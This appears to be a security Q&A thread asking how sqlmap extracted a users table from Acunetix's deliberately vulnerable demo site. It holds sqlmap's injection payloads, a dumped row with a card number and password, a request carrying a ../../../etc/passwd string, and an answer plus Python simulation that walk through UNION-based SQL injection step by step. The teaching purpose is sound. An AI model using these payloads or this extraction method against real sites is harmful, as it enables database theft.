How does sqlmap manage to get all the information out of the database?

1

I am curious to know how sqlmap is able to get all the information from the database. I am using Burp as a proxy to view all the requests and responses. In the response I could not see any information related to the database, but sqlmap is able to show the related information. For example, if I use sqlmap -u link -D acuart -T users --dump --proxy="http://192.168.0.115:8181", I am able to get the records from the users table in the acuart database.

This is the sqlmap output:

[*] starting at 17:55:43

[17:55:43] [INFO] resuming back-end DBMS 'mysql' 
[17:55:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7494=7494

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 4839 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (CASE WHEN (4839=4839) THEN 1 ELSE 0 END)),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x616b7441734e6d755964,0x716a717871),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cat=1 AND (SELECT * FROM (SELECT(SLEEP(15)))Swtz)
---
[17:55:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[17:55:49] [INFO] fetching columns for table 'users' in database 'acuart'
[17:55:49] [INFO] fetching entries for table 'users' in database 'acuart'
[17:55:49] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart | pass | uname | phone   | email           | address   |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 0    | test | test  | 2323345 | [email protected] | 21 street |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+

[17:55:49] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[17:55:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 17:55:49

Request seen in the proxy:

GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache,no-store

Response seen in the proxy:

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sun, 03 May 2015 13:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Content-Length: 7011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="http://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
  <div id="globalNav"> 
        <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
    <td align="left">
        <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
        </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
        <a href="guestbook.php">guestbook</a> | 
        <a href="AJAX/index.php">AJAX Demo</a>
    </td>
    <td align="right">
        </td>
    </tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
    <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin.
</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <input name="searchFor" type="text" size="10"> 
      <input name="goButton" type="submit" value="go"> 
    </form> 
  </div> 
  <div id="sectionLinks"> 
    <ul> 
      <li><a href="categories.php">Browse categories</a></li> 
      <li><a href="artists.php">Browse artists</a></li> 
      <li><a href="cart.php">Your cart</a></li> 
      <li><a href="login.php">Signup</a></li>
      <li><a href="userinfo.php">Your profile</a></li>
      <li><a href="guestbook.php">Our guestbook</a></li>
        <li><a href="AJAX/index.php">AJAX Demo</a></li>
      </li> 
    </ul> 
  </div> 
  <div class="relatedLinks"> 
    <h3>Links</h3> 
    <ul> 
      <li><a href="http://www.acunetix.com">Security art</a></li> 
      <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> 
    </ul> 
  </div> 
  <div id="advert"> 
    <p>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">
        <param name="movie" value="Flash/add.swf">
        <param name=quality value=high>
        <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>
      </object>
    </p>
  </div> 
</div> 

<!--end navbar --> 
<div id="siteInfo">  <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> | &copy;2006
  Acunetix Ltd 
</div> 
<br> 
</div>
</body>
<!-- InstanceEnd --></html>

Your explanation is much appreciated. Thank you.

posted by overshadow 03.05.2015 - 09:54

2 answers

3

It looks like there is something wrong with the request you posted. Since the vulnerable parameter is the "cat" parameter, the "&" in your request separates the payload from the vulnerable parameter, and therefore no information is revealed.

Let's do it properly:

A request to:

link

reveals an error message indicating that the number of columns differs from the number in the original query:

Error: The used SELECT statements have a different number of columns

By increasing the number of columns (adding comma-separated numbers) until the message disappears, we determine that the number of columns must be 11.

This is because a request for the following results in a valid page:

link

We see that a number of elements have been added to our page. The numbers 7, 2 and 9 are easily visible in each of the items. If we replace one of them with the information we want to receive (table_name from information_schema.tables), we get the information you were looking for:

link

(The users table is in the last element.)

The same positions can be used to extract all the other information you are looking for. Just change the column you want to receive and the table the data lives in.

answered 04.05.2015 - 09:17
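The procedure the answer walks through (grow the UNION until the column-count error disappears, find which columns the template prints, then put the wanted expression into one of them), as an added example that is not code from the original post. It is a self-contained simulation: an in-memory SQLite database stands in for the MySQL behind testphp.vulnweb.com (assumption), the products table with its 11 columns, the category-1 row and the users row are all constructed here, and sqlite_master plays the part of information_schema.tables. SQLite concatenates with || where MySQL uses CONCAT(). The two delimiter strings are what the 0x7176627171 and 0x716a717871 hex literals in the sqlmap payloads above decode to; wrapping the extracted value in them is how sqlmap finds its data inside a page that otherwise looks unchanged. The last helper shows why the posted request revealed nothing: after the "&", the payload is a separate parameter and "cat" stays a harmless 1.

```python
import re
import sqlite3
from urllib.parse import parse_qs

NUM_COLUMNS = 11                      # matches "MySQL UNION query (NULL) - 11 columns" in the sqlmap output
VISIBLE = (1, 6, 8)                   # 0-based positions the template prints: columns 2, 7 and 9 (assumption)
DELIM_L, DELIM_R = "qvbqq", "qjqxq"   # decoded 0x7176627171 / 0x716a717871 from the sqlmap payloads


def build_db():
    """Constructed sample data (not the real site's schema): one product in category 1, one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id, cat, title, descr, artist, price, pic, f8, f9, f10, f11)")
    conn.execute("INSERT INTO products VALUES (1, 1, 'The shore', 'Lorem ipsum', 'r4w8173', 10, "
                 "'pictures/1.jpg', 'x8', 'x9', 'x10', 'x11')")
    conn.execute("CREATE TABLE users (uname, pass, email)")
    conn.execute("INSERT INTO users VALUES ('test', 'test', 'test@example.com')")
    return conn


def vulnerable_listproducts(conn, cat):
    """The bug being exploited: 'cat' is pasted straight into the SQL text, as listproducts.php does."""
    try:
        rows = conn.execute(f"SELECT * FROM products WHERE cat={cat}").fetchall()
        return {"error": None, "rows": rows}
    except sqlite3.OperationalError as exc:
        return {"error": str(exc), "rows": []}


def render(result):
    """Template stand-in: prints only the VISIBLE columns of each row, or the database error."""
    if result["error"]:
        return f"Error: {result['error']}"
    return "\n".join("<div class='story'>" + " ".join(str(row[i]) for i in VISIBLE) + "</div>"
                     for row in result["rows"])


def find_column_count(page, max_cols=20):
    """Step 1: grow 'UNION ALL SELECT 1,2,...' until the column-mismatch error goes away."""
    for n in range(1, max_cols + 1):
        payload = "1 UNION ALL SELECT " + ",".join(str(i) for i in range(1, n + 1))
        if page(payload)["error"] is None:
            return n
    raise RuntimeError(f"no UNION with up to {max_cols} columns was accepted")


def find_visible_positions(page, ncols):
    """Step 2: inject a unique marker per column and see which ones the template prints."""
    payload = "1 UNION ALL SELECT " + ",".join(f"'zq{i}zq'" for i in range(1, ncols + 1))
    html = render(page(payload))
    return [i for i in range(1, ncols + 1) if f"zq{i}zq" in html]


def extract(page, ncols, position, expr, from_clause=""):
    """Step 3: place the wanted expression in a printed column, wrapped in delimiters,
    and pull every delimited value back out of the HTML with a regex."""
    cols = ["NULL"] * ncols
    cols[position - 1] = f"'{DELIM_L}' || ({expr}) || '{DELIM_R}'"
    payload = "1 UNION ALL SELECT " + ",".join(cols) + (" " + from_clause if from_clause else "")
    return re.findall(f"{DELIM_L}(.*?){DELIM_R}", render(page(payload)))


def cat_value(query_string):
    """What the page sees as $_GET['cat'] (assumes PHP-style query-string parsing):
    a payload after '&' becomes its own parameter and never reaches the query."""
    return parse_qs(query_string).get("cat", [""])[0]


def demo():
    conn = build_db()

    def page(cat):
        return vulnerable_listproducts(conn, cat)

    ncols = find_column_count(page)
    visible = find_visible_positions(page, ncols)
    tables = extract(page, ncols, visible[0], "name", "FROM sqlite_master WHERE type='table'")
    users = extract(page, ncols, visible[0], "uname || ':' || pass", "FROM users")
    return {"columns": ncols, "visible": visible, "tables": tables, "users": users}


if __name__ == "__main__":
    print(demo())
    print("cat as the page sees it:", cat_value("cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201--"))
```

Against the real target the same three steps run over HTTP, with information_schema.tables (filtered on table_schema=database()) in place of sqlite_master and a trailing # or -- to swallow the rest of the original query; the MySQL UNION payload sqlmap printed above is exactly step 3 with the delimiters around a canary value.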
1

This thread is quite old, but for anyone who wants to know how sqlmap works: use -v6 (verbosity level 6) while running the sqlmap command.

answered 13.11.2016 - 09:05
